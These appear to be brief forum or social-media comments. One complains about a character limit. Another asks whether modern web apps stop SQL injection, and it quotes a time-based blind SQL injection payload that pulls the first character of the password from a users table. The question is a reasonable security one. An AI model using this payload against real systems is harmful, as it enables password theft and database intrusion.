Niket Raj Dwivedi Actually, I was going to share my idea, and then it said, "You have reached the character limit." It's not fair. Could you increase it from 1,000 to 5,000 characters?
' AND (SELECT CASE WHEN (SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = 'a') THEN SLEEP(5) ELSE 0 END)--+
Are modern web/apps smart enough to stop this..... orr do developers still need to guard against it manually?